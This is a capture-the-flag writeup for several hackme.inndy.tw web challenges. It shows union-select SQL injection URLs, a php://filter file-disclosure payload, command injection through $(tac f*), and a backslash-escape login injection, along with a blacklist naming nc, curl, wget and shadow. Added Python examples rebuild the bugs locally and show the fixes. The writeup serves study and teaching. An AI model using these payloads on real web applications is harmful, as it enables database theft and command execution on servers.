https://wywwzjj.top/2019/02/02/Hackme-Writeup/
hide and seek
Can you see me? I’m so close to you but you can’t see me.
Just view the page source for this one.
guestbook
This guestbook sucks. sqlmap is your friend.
Since the hint mentions sqlmap, you could probably just point it at the page and be done.
I tried some manual injection first and found no filtering at all.
There are four columns; check which positions are echoed back:
https://hackme.inndy.tw/gb/?mod=read&id=0 union select 1,2,3,4
All four positions are clearly echoed, so go straight to union-based extraction; blind injection would be far slower.
Get the column names, then query all the data:
https://hackme.inndy.tw/gb/?mod=read&id=0 union select 1,2,3,group_concat(flag) from flag
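To make the two steps above reproducible offline, here is an added example (my code, not from the writeup) that rebuilds the bug against an in-memory SQLite database: a guestbook table with four columns and a flag table, both constructed here. It walks the column count up with union select until the query stops erroring, reads the flag out of an echoed position with group_concat, and shows the parameterised query that turns the same payload back into harmless data. The real target is MySQL; the column-name discovery step (information_schema on MySQL) is not modelled.

```python
import sqlite3


def make_guestbook():
    """Constructed stand-in for the challenge database: a four-column guestbook
    table (the width the union probe revealed) plus the flag table."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE guestbook (id INTEGER, name TEXT, title TEXT, body TEXT);
        INSERT INTO guestbook VALUES (1, 'alice', 'hi', 'first post');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('FLAG{constructed-sample-flag}');
    """)
    return conn


def read_vulnerable(conn, id_param):
    """Mirrors the bug: the id parameter is pasted into the SQL unescaped."""
    sql = "SELECT id, name, title, body FROM guestbook WHERE id = %s" % id_param
    return conn.execute(sql).fetchall()


def find_column_count(conn, max_cols=8):
    """Step 1: grow 'union select 1,2,...' until the column counts match.
    Returns (count, first_row); the row shows which positions are echoed."""
    for n in range(1, max_cols + 1):
        probe = "0 union select " + ",".join(str(i) for i in range(1, n + 1))
        try:
            rows = read_vulnerable(conn, probe)
        except sqlite3.OperationalError:
            continue            # column-count mismatch: try one more
        return n, rows[0]
    raise RuntimeError('no matching column count up to %d' % max_cols)


def dump_flag(conn):
    """Step 2: put group_concat(flag) into an echoed position (the 4th here)."""
    rows = read_vulnerable(conn, "0 union select 1,2,3,group_concat(flag) from flag")
    return rows[0][3]


def read_safe(conn, id_param):
    """The fix: bind the parameter. The payload is then just a non-numeric id
    that matches no row."""
    return conn.execute(
        "SELECT id, name, title, body FROM guestbook WHERE id = ?", (id_param,)
    ).fetchall()


if __name__ == '__main__':
    db = make_guestbook()
    print('columns:', find_column_count(db))
    print('flag:', dump_flag(db))
    print('same payload, bound parameter:',
          read_safe(db, "0 union select 1,2,3,group_concat(flag) from flag"))
```
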
LFI
What is this admin's password? That is not important at all, just get the flag. Tips: LFI, php://filter
This uses the PHP stream wrapper php://filter:
php://filter/read=convert.base64-encode/resource=pages/login
// base64-decoding the response gives login.php
<?php
require('config.php');
if($_POST['user'] === 'admin' && md5($_POST['pass']) === 'bed128365216c019988915ed3add75fb') {
echo $flag;
} else {
?>
<form action="?page=pages/login" method="post" role="form">
<div class="form-group">
<label for="user-i">User</label>
<input type="text" class="form-control" id="user-i" placeholder="Username" name="user">
</div>
<div class="form-group">
<label for="pass-i">Password</label>
<input type="password" class="form-control" id="pass-i" placeholder="Password" name="pass">
</div>
<button type="submit" class="btn btn-primary">Login</button>
</form>
<?php } ?>
// read config.php the same way to get the flag
$flag = "FLAG{Yoooooo_xsXSYP......}";
homepage
Where is the flag? Did you check the code?
The hint says to check the source, and there's an odd cute.js in it:
ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ ['_']; o=(ﾟｰﾟ) =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: '_' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +'_') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ '_')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +'_')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +'_') [c^_^o];(ﾟДﾟ) ['c'] = ((ﾟДﾟ)+'_') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) ['o'] = ((ﾟДﾟ)+'_') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) ['c']+(ﾟДﾟ) ['o']+(ﾟωﾟﾉ +'_')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +'_') [ﾟｰﾟ] + ((ﾟДﾟ)......
Others said this is aaencode. I was a bit lost, so I'll come back to it later; this kind of challenge isn't worth spending much time on.
ping
Can you ping 127.0.0.1?
Looks like a source-audit challenge: command injection.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Ping</title>
</head>
<body>
<form action="." method="GET">
IP: <input type="text" name="ip"> <input type="submit" value="Ping">
</form>
<pre><?php
$blacklist = [
'flag', 'cat', 'nc', 'sh', 'cp', 'touch', 'mv', 'rm', 'ps', 'top', 'sleep', 'sed',
'apt', 'yum', 'curl', 'wget', 'perl', 'python', 'zip', 'tar', 'php', 'ruby', 'kill',
'passwd', 'shadow', 'root',
'z',
'dir', 'dd', 'df', 'du', 'free', 'tempfile', 'touch', 'tee', 'sha', 'x64', 'g',
'xargs', 'PATH',
'$0', 'proc',
'/', '&', '|', '>', '<', ';', '"', '\'', '\\', "\n"
];
set_time_limit(2);
function ping($ip) {
global $blacklist;
if(strlen($ip) > 15) {
return 'IP toooooo longgggggggggg';
} else {
foreach($blacklist as $keyword) {
if(strstr($ip, $keyword)) {
return "{$keyword} not allowed";
}
}
$ret = [];
exec("ping -c 1 \"{$ip}\" 2>&1", $ret);
return implode("\n", array_slice($ret, 0, 10));
}
}
if(!empty($_GET['ip']))
echo htmlentities(ping($_GET['ip']));
else
highlight_file(__FILE__);
?></pre>
</body>
</html>
$ is not in the blacklist, and neither are backticks, so command substitution still works inside the double quotes:
$(ls) / `ls`
ping: flag.php
index.php: Name or service not known
# cat is filtered, but plenty of other commands print file contents
tac prints from the last line backwards; it's cat spelled in reverse!
more shows the file one screen at a time
less is like more, but can also page backwards
head shows only the first few lines
tail shows only the last few lines
nl prints the file with line numbers
# and since flag is blacklisted, use * to glob the filename
$(tac f*)
ping: $flag = 'FLAG{ping_$(capture-the-flag)_U.....}';
<?php: Name or service not known
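To see exactly which inputs get past this filter and why, here is an added example (my code, not from the writeup or the challenge) that ports the PHP checks to Python with the blacklist copied as-is, builds the string exec() would hand to the shell without running it, and puts the allow-list fix next to it: parse the value with the ipaddress module and invoke ping through an argv list, so no shell is involved and the blacklist becomes unnecessary. The payload list in the main block is constructed for illustration; safe_ping() is defined but never called here because it needs a ping binary.

```python
import ipaddress
import subprocess

# Blacklist from the challenge's ping.php, copied as-is.
BLACKLIST = [
    'flag', 'cat', 'nc', 'sh', 'cp', 'touch', 'mv', 'rm', 'ps', 'top', 'sleep', 'sed',
    'apt', 'yum', 'curl', 'wget', 'perl', 'python', 'zip', 'tar', 'php', 'ruby', 'kill',
    'passwd', 'shadow', 'root',
    'z',
    'dir', 'dd', 'df', 'du', 'free', 'tempfile', 'touch', 'tee', 'sha', 'x64', 'g',
    'xargs', 'PATH',
    '$0', 'proc',
    '/', '&', '|', '>', '<', ';', '"', "'", '\\', '\n',
]


def php_filter(ip):
    """Port of the challenge's checks in the same order: 15-byte cap, then a
    case-sensitive substring match (PHP strstr) in list order. Returns None
    when the input would reach exec(), else the rejection text the page prints."""
    if len(ip.encode()) > 15:            # PHP strlen() counts bytes
        return 'IP toooooo longgggggggggg'
    for keyword in BLACKLIST:
        if keyword in ip:
            return '%s not allowed' % keyword
    return None


def vulnerable_command(ip):
    """The string ping.php hands to /bin/sh. Built for inspection only:
    $(...) and `...` are still expanded by the shell inside double quotes."""
    return 'ping -c 1 "%s" 2>&1' % ip


def triage(payloads):
    """Run candidate inputs through the filter; None means it survives."""
    return {p: php_filter(p) for p in payloads}


def safe_ping_argv(ip):
    """Hardened version: allow-list the value as an IP address and build argv
    directly. Anything that is not an address raises ValueError."""
    addr = ipaddress.ip_address(ip.strip())
    return ['ping', '-c', '1', str(addr)]


def safe_ping(ip):
    """Execute the hardened command without a shell (needs a ping binary)."""
    res = subprocess.run(safe_ping_argv(ip), capture_output=True, text=True, timeout=2)
    return '\n'.join((res.stdout + res.stderr).splitlines()[:10])


if __name__ == '__main__':
    candidates = ['127.0.0.1', 'cat flag.php', '$(ls)', '`ls`',
                  '$(tac flag.php)', '$(tac /etc/passwd)', '$(tac f*)']
    for payload, verdict in triage(candidates).items():
        print('%-22r -> %s' % (payload,
                               verdict or 'reaches exec(): ' + vulnerable_command(payload)))
```

Note that the length cap is what forces the glob: `$(tac flag.php)` is exactly 15 bytes but dies on the `flag` keyword, while `$(tac /etc/passwd)` is already too long before any keyword is checked.
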
scoreboard
DO NOT ATTACK or SCAN scoreboard, you don’t need to do that.
There's an x-flag header in the response.
login as admin 0
SQL Injection!
The challenge hands out the source, so let's audit it.
<?php
require('config.php');
// table schema
// user -> id, user, password, is_admin
function safe_filter($str) {
$strl = strtolower($str);
if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') ||
strstr($strl, 'update') || strstr($strl, 'delete')
) {
return '';
}
return str_replace("'", "\\'", $str);
// \' => \\'
}
$_POST = array_map(safe_filter, $_POST);
$user = null;
// connect to database
if(!empty($_POST['name']) && !empty($_POST['password'])) {
$connection_string = sprintf('mysql:host=%s;dbname=%s;charset=utf8mb4', DB_HOST, DB_NAME);
$db = new PDO($connection_string, DB_USER, DB_PASS);
$sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'",
$_POST['name'],
$_POST['password']
);
try {
$query = $db->query($sql);
if($query) {
$user = $query->fetchObject();
} else {
$user = false;
}
} catch(Exception $e) {
$user = false;
}
}
<?php if(!$user): ?>
<?php
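The comment `\' => \\'` in safe_filter() is the bug: quotes are escaped but backslashes are not, so a backslash at the end of the input consumes the quote that sprintf() puts after it, and whatever follows is parsed as SQL rather than matched as data. The added example below (my code, not the challenge's) ports safe_filter() and the sprintf() template to Python, tokenizes the resulting statement with MySQL's default quoting rules (backslash escapes inside '...', '#' comments) to show which attacker-controlled bytes end up outside any string literal, and contrasts it with a parameterised query against a constructed in-memory SQLite user table. The sample inputs and the admin row in make_db() are constructed; the tokenizer assumes default sql_mode (not NO_BACKSLASH_ESCAPES) and models single-quoted literals only.

```python
import sqlite3

# The sprintf() template from the challenge source.
TEMPLATE = "SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'"


def safe_filter(s):
    """Port of the challenge's safe_filter(): keyword block, then escape quotes
    only. Backslashes pass through untouched."""
    sl = s.lower()
    if any(k in sl for k in ('or 1=1', 'drop', 'update', 'delete')):
        return ''
    return s.replace("'", "\\'")


def build_query(name, password):
    """What the PHP sprintf() produces for a given POST body."""
    return TEMPLATE % (safe_filter(name), safe_filter(password))


def split_mysql(sql):
    """Tokenize a statement the way MySQL (default sql_mode) reads it: inside a
    '...' literal a backslash escapes the next character and '' is a quote;
    outside literals '#' or '-- ' comments out the rest of the line.
    Returns a list of (kind, text), kind in code/str/comment/unterminated."""
    tokens, buf, state, i = [], '', 'code', 0
    while i < len(sql):
        ch = sql[i]
        if state == 'code':
            if ch == "'":
                if buf:
                    tokens.append(('code', buf))
                buf, state = '', 'str'
            elif ch == '#' or sql.startswith('-- ', i):
                if buf:
                    tokens.append(('code', buf))
                tokens.append(('comment', sql[i:]))
                return tokens
            else:
                buf += ch
            i += 1
        else:
            if ch == '\\' and i + 1 < len(sql):
                buf += sql[i:i + 2]          # escaped char stays inside the literal
                i += 2
            elif ch == "'" and sql[i + 1:i + 2] == "'":
                buf += "''"                  # doubled quote, also inside the literal
                i += 2
            elif ch == "'":
                tokens.append(('str', buf))
                buf, state = '', 'code'
                i += 1
            else:
                buf += ch
                i += 1
    if state == 'str':
        tokens.append(('unterminated', buf))
    elif buf:
        tokens.append(('code', buf))
    return tokens


def injected_code(name, password):
    """Code fragments of the built query that are not part of TEMPLATE, i.e.
    attacker text MySQL would execute as SQL instead of comparing as data."""
    expected = [t for k, t in split_mysql(TEMPLATE % ('', '')) if k == 'code']
    actual = [t for k, t in split_mysql(build_query(name, password)) if k == 'code']
    return [t for t in actual if t not in expected]


def make_db():
    """Constructed stand-in (SQLite) for the challenge's user table."""
    conn = sqlite3.connect(':memory:')
    conn.executescript("""
        CREATE TABLE user (id INTEGER, user TEXT, password TEXT, is_admin INTEGER);
        INSERT INTO user VALUES (1, 'admin', 'constructed-secret', 1);
    """)
    return conn


def login_parameterized(conn, name, password):
    """The fix (PDO prepare()/execute() in PHP): values are bound, never spliced."""
    return conn.execute("SELECT * FROM user WHERE user = ? AND password = ?",
                        (name, password)).fetchone()


if __name__ == '__main__':
    # Constructed inputs: a harmless quote, the \' case from the source comment,
    # and a trailing backslash that lets the password field become SQL.
    for name, pw in [("admin'", "x"), ("\\'", "x"), ("\\", " or 1#")]:
        print(repr(build_query(name, pw)))
        for tok in split_mysql(build_query(name, pw)):
            print('   ', tok)
        print('    outside literals:', injected_code(name, pw))
```
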